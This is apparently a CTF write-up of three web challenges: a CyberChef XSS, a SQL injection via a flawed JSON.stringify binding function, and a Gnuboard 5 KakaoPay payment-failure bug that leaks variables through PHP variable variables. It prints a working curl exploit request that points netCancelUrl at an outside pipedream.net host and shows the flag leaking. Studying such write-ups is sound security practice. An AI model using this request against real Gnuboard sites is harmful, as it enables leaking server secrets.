This weekend, Hayyim Security hosted the CTF, and I participated in it for about 3 ~ 4 hours and I was solved Cyberchef, Not E and Cyber Headchef challenges.
(Web) Cyberchef [100 pts]
The Cyberchef is a simple XSS challenge. Cyberchef service is open source that provides encryption/decryption service and has 1-Day vulnerability.
1-Day issues can be found here. And I was able to get the flag by sending the above PoC to the admin bot.
1
FLAG : hsctf{fa98fe3d32b4302aff1c322c925238a9d935b636f265cbfdd798391ca9c5a905}
(Web) Not E [158 pts]
The Not E challenge is a SQL Injection issue. In this problem, we are using our own binding function, not the Prepared Binding function provided by sqlite of Node, and this function has a vulnerability.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15
const sqlite3 = require('sqlite3'); const flag = require('fs').readFileSync('/flag').toString();
classDatabase { constructor(filename) { this.db = new sqlite3.Database(filename);
this.db.serialize(() => { this.run('create table members (username text, password text)'); this.run('create table posts (id text, title text, content text, owner text)'); this.run('create table flag (flag text)'); this.run('insert into flag values (?)', [ flag ]); }); } // (skip..)
I could see the FLAG were stored in a table called flag. So, in order to solve this challenge, we have to use SQL Injection to leak the flags contained in the table. Otherwise, read the /flag file using RCE, but this is not possible. Therefore, we should focus on SQL Injection.
/login
/logout
/new
/view/:noteId
First, the functions provided by the Note service are login, post writing, and post reading functions.
In addition, all sql queries are using custom binding function. I thought there was a weakness here. The reason is that the server uses the custom binding function even though the node’s sqlite provides the binding function.
In the formatQuery() function, after using the JSON.stringify() method to convert the input value into a string, you can see that the generated value and ‘?’ are replaced.
When JSON.stringify() is used, double quotation marks(“) are added to both ends of the string as shown above.
1
insertinto posts values ('noteid', ""?"", ?, ?)
If you use the writing function and pass a question mark character as the value of title, the query is created as above. And when you check the value of the second argument of the query, you can see that a question mark is created after the string (“”), and the value of content is replaced with the question mark randomly generated. so you can escape the double quarter by this.
So I was able to get the flag by sending the above PoC to the admin bot.
1
FLAG : hsctf{be9e5b8bce203e203597dca3d67e0f7a38e359a9ab7799988e888be073c78da0}
(Web/Not Solve) Gnuboard [498 pts]
The Gnuboard challenge is to solve it using 0-Day. This challenge was so difficult that I couldn’t solve it while the competition was in progress, and after the competition I asked as3617.
I could see in the docker file that the latest version of Gnuboard 5 was being used, and the flag was defined as a variable called $flag in common.php. So, after a long time, I started to analyze GnuBoard and found the SQL Injection vector, but it might not work well, and even if SQL Injection occurs, I don’t think I can do anything using it. So I had to give up.
1
Hint : Gnuboard, It really has too many functions to be a just "board". It seems the way how they implement the payment is meh.
Hayyim Security provided a hint because there was no solver for the challenge. Hint mentioned the payment part.
///$mKey = $util->makeHash(signKey, "sha256"); // 가맹점 확인을 위한 signKey를 해시값으로 변경 (SHA-256방식 사용) $mKey = hash("sha256", $signKey);
//##################### // 2.signature 생성 //##################### $signParam['authToken'] = $authToken; // 필수 $signParam['timestamp'] = $timestamp; // 필수 // signature 데이터 생성 (모듈에서 자동으로 signParam을 알파벳 순으로 정렬후 NVP 방식으로 나열해 hash) $signature = $util->makeSignature($signParam);
// signature 데이터 생성 $secureSignature = $util->makeSignatureAuth($secureMap); /************************* 결제보안 추가 2016-05-18 END ****************************/
$sql = " select * from {$g5['g5_shop_order_data_table']} where od_id = '$oid' "; $row = sql_fetch($sql);
if ((strcmp('0000', $resultMap['resultCode']) == 0) && (strcmp($secureSignature, $resultMap['authSignature']) == 0) ) { //결제보안 추가 2016-05-18 /* * *************************************************************************** * 여기에 가맹점 내부 DB에 결제 결과를 반영하는 관련 프로그램 코드를 구현한다. [중요!] 승인내용에 이상이 없음을 확인한 뒤 가맹점 DB에 해당건이 정상처리 되었음을 반영함 처리중 에러 발생시 망취소를 한다. * **************************************************************************** */
// 수신결과를 파싱후 resultCode가 "0000"이면 승인성공 이외 실패 // 가맹점에서 스스로 파싱후 내부 DB 처리 후 화면에 결과 표시 // payViewType을 popup으로 해서 결제를 하셨을 경우 // 내부처리후 스크립트를 이용해 opener의 화면 전환처리를 하세요 //throw new Exception("강제 Exception"); } catch (Exception$e) { // $s = $e->getMessage() . ' (오류코드:' . $e->getCode() . ')'; //#################################### // 실패시 처리(***가맹점 개발수정***) //#################################### //---- db 저장 실패시 등 예외처리----// $s = $e->getMessage() . ' (오류코드:' . $e->getCode() . ')'; echo$s;
//##################### // 망취소 API //#####################
echo"<pre>", $netcancelResultString . "</pre>"; // 취소 결과 확인 } } // https://github.com/gnuboard/gnuboard5/blob/master/shop/kakaopay/pc_pay_result.php
The above code is the Kakao Pay payment logic. The important thing here is to use the try/catch statement, and the vulnerability occurs in the catch statement.
The code above is executed when payment fails. Send a request to $netCancle using the $httpUtil->processHTTP() function, and store the return value in the $netcancelResultString variable. After that, I could see that variable variables were used twice in total by using the str_replace() function.
1. First str_replace() $$netcancelResultString := $authToken = flag $netcancelResultString = flag
2. Second str_replace() $$netcancelResultString := $flag $netcancelResultString = hsctf{~~~~}
If the string called authToken is included in the value of $netcancelResultString after http request as above When the str_replace() function is called for the first time, the string called flag will be saved as the value of the $netcancelResultString variable by variable variables. ($authToken is flag)
The second time the str_replace() function is called, the value of the $$netcancelResultString variable is the same as $flag, so the flag saved in common.php will be saved in the $netcancelResultString variable.
1 2
$authUrl = $_REQUEST['authUrl']; // 승인요청 API url(수신 받은 값으로 설정, 임의 세팅 금지) // https://github.com/gnuboard/gnuboard5/blob/master/shop/kakaopay/pc_pay_result.php#L33
In order to generate an error, pass an incorrect URL as the value of authUrl.
1 2 3 4
⚡ root@pocas ~ curl http://1.230.253.91:5000/shop/kakaopay/pc_pay_result.php\?authUrl\=http://\&netCancelUrl\=https://6668197e65f7e3f7f5b45ff55a909ddd.m.pipedream.net/\&authToken\=flag\&resultCode\=0000 Http Connect Error Connection failed (0) Failed to parse address ""Http Connect Error (오류코드:0)## 망취소 API 결과 ##<pre>hsctf{799c12711fd9d697a00ae3e6329a7979cc648d7cdae0fbb3d62f23a1f7c7f544}</pre><br><br>결제 에러가 일어났습니다. 에러 이유는 위와 같습니 다.
Finally I got the flags by sending a request like above.
1
FLAG : hsctf{799c12711fd9d697a00ae3e6329a7979cc648d7cdae0fbb3d62f23a1f7c7f544}
Thanks to Hayyim Security for making these fun challenges. It’s been a long time since I studied a lot.
